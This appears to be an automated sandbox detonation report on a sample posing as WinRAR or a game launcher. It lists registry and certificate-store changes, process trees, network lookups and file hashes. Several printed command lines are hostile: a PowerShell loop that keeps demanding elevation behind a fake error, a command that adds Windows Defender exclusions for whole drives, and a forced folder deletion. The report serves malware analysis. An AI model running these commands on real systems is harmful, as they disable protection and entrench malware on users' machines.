| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\DropHandler | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\ = "WinRAR archive" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shell\open | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.rev\ = "WinRAR.REV" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\ShellEx\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell\open\command | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\shell\open\command | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe,1" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\DropHandler\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe\" \"%1\"" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe,0" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.rev | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\ShellEx\DragDropHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe\" \"%1\"" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\ = "RAR recovery volume" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\ = "WinRAR ZIP archive" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\shell | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe
"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | notifier.rarlab.com | udp |
| DE | 51.195.68.172:80 | notifier.rarlab.com | tcp |
| DE | 51.195.68.172:443 | notifier.rarlab.com | tcp |
| DE | 51.195.68.172:443 | notifier.rarlab.com | tcp |
Files
Analysis: behavioral24
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:24
Platform
win10v2004-20240226-en
Max time kernel
143s
Max time network
162s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 179.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.173.189.20.in-addr.arpa | udp |
Files
Analysis: behavioral31
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:24
Platform
win7-20240221-en
Max time kernel
120s
Max time network
149s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2208 wrote to memory of 2824 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
| PID 2208 wrote to memory of 2824 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
| PID 2208 wrote to memory of 2824 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\BLAKEX64.dll,#1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2208 -s 84
Network
Files
Analysis: behavioral30
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:24
Platform
win10v2004-20240226-en
Max time kernel
131s
Max time network
168s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\vhXDYuQByxPS.ps1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x43c 0x2ec
Network
| Country | Destination | Domain | Proto |
| US | 138.91.171.81:80 | | tcp |
| US | 8.8.8.8:53 | 18.53.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.72.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_twdwmxgd.zk1.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3744-6-0x0000023ED2F80000-0x0000023ED2FA2000-memory.dmp
memory/3744-10-0x00007FF934350000-0x00007FF934E11000-memory.dmp
memory/3744-11-0x0000023ED2EB0000-0x0000023ED2EC0000-memory.dmp
memory/3744-12-0x0000023ED2EB0000-0x0000023ED2EC0000-memory.dmp
memory/3744-15-0x00007FF934350000-0x00007FF934E11000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:25
Platform
win10v2004-20240226-en
Max time kernel
113s
Max time network
198s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Launcher.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 20.231.121.79:80 | | tcp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.178.17.96.in-addr.arpa | udp |
| US | 13.107.246.64:443 | | tcp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.72.42.20.in-addr.arpa | udp |
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:24
Platform
win7-20240221-en
Max time kernel
118s
Max time network
143s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\VO1DaL46eflm.ps1
Network
Files
memory/2176-4-0x000000001B4E0000-0x000000001B7C2000-memory.dmp
memory/2176-5-0x0000000001EC0000-0x0000000001EC8000-memory.dmp
memory/2176-6-0x000007FEF4AA0000-0x000007FEF543D000-memory.dmp
memory/2176-7-0x0000000001FB0000-0x0000000002030000-memory.dmp
memory/2176-8-0x000007FEF4AA0000-0x000007FEF543D000-memory.dmp
memory/2176-10-0x0000000001FB0000-0x0000000002030000-memory.dmp
memory/2176-9-0x0000000001FB0000-0x0000000002030000-memory.dmp
memory/2176-11-0x0000000001FB0000-0x0000000002030000-memory.dmp
memory/2176-12-0x0000000001FB0000-0x0000000002030000-memory.dmp
memory/2176-13-0x000007FEF4AA0000-0x000007FEF543D000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:25
Platform
win10v2004-20240226-en
Max time kernel
101s
Max time network
219s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe | N/A |
Enumerates physical storage devices
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe
"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"
C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT
Network
| Country | Destination | Domain | Proto |
| GB | 142.250.187.234:443 | | tcp |
| US | 8.8.8.8:53 | 175.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 13.107.246.64:443 | | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.173.189.20.in-addr.arpa | udp |
Files
memory/3088-0-0x00000000739A0000-0x0000000074150000-memory.dmp
memory/3088-1-0x0000000002940000-0x0000000002950000-memory.dmp
memory/3088-2-0x00000000028D0000-0x0000000002906000-memory.dmp
memory/3088-3-0x0000000005550000-0x0000000005B78000-memory.dmp
memory/3088-4-0x0000000005440000-0x0000000005462000-memory.dmp
memory/3088-5-0x0000000005BF0000-0x0000000005C56000-memory.dmp
memory/3088-6-0x0000000005C60000-0x0000000005CC6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s0cslch0.n3i.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3088-16-0x0000000005CD0000-0x0000000006024000-memory.dmp
memory/3088-17-0x0000000006210000-0x000000000622E000-memory.dmp
memory/3088-18-0x0000000006310000-0x000000000635C000-memory.dmp
memory/3088-19-0x0000000002940000-0x0000000002950000-memory.dmp
memory/3088-20-0x00000000072D0000-0x0000000007366000-memory.dmp
memory/3088-21-0x00000000067C0000-0x00000000067DA000-memory.dmp
memory/3088-22-0x0000000006810000-0x0000000006832000-memory.dmp
memory/3088-23-0x0000000007920000-0x0000000007EC4000-memory.dmp
memory/3088-24-0x00000000739A0000-0x0000000074150000-memory.dmp
memory/3088-25-0x0000000002940000-0x0000000002950000-memory.dmp
memory/940-26-0x00000000739A0000-0x0000000074150000-memory.dmp
memory/940-27-0x0000000000CF0000-0x0000000000D00000-memory.dmp
memory/3088-29-0x0000000002940000-0x0000000002950000-memory.dmp
memory/940-28-0x0000000000CF0000-0x0000000000D00000-memory.dmp
memory/940-39-0x0000000000CF0000-0x0000000000D00000-memory.dmp
memory/940-40-0x000000007F5F0000-0x000000007F600000-memory.dmp
memory/940-41-0x0000000006050000-0x0000000006082000-memory.dmp
memory/940-42-0x00000000702E0000-0x000000007032C000-memory.dmp
memory/940-52-0x0000000006030000-0x000000000604E000-memory.dmp
memory/940-53-0x0000000006C70000-0x0000000006D13000-memory.dmp
memory/940-54-0x0000000007400000-0x0000000007A7A000-memory.dmp
memory/940-55-0x00000000047B0000-0x00000000047BA000-memory.dmp
memory/940-56-0x0000000006FD0000-0x0000000006FE1000-memory.dmp
memory/940-57-0x0000000007000000-0x000000000700E000-memory.dmp
memory/940-58-0x0000000007010000-0x0000000007024000-memory.dmp
memory/940-59-0x0000000007050000-0x000000000706A000-memory.dmp
memory/940-60-0x0000000007040000-0x0000000007048000-memory.dmp
memory/940-64-0x00000000739A0000-0x0000000074150000-memory.dmp
memory/3088-65-0x0000000002940000-0x0000000002950000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6cef6d154330ef08cec5d61caae87c59 |
| SHA1 | 3a7a52d713bfb75e03834ecebf80a3dbba5aa69e |
| SHA256 | d34857415540862d8fcae632c93891b93fe5539e23b13365a05742b4c2ed7085 |
| SHA512 | 7538ddd1cbd0a0608dd52379facff2b0818cd04dddd0188bd311737383370f756c3ef26e1501c3dd70e9dbb11cebe4c3d798eef4663f4388205233171326418c |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 968cb9309758126772781b83adb8a28f |
| SHA1 | 8da30e71accf186b2ba11da1797cf67f8f78b47c |
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
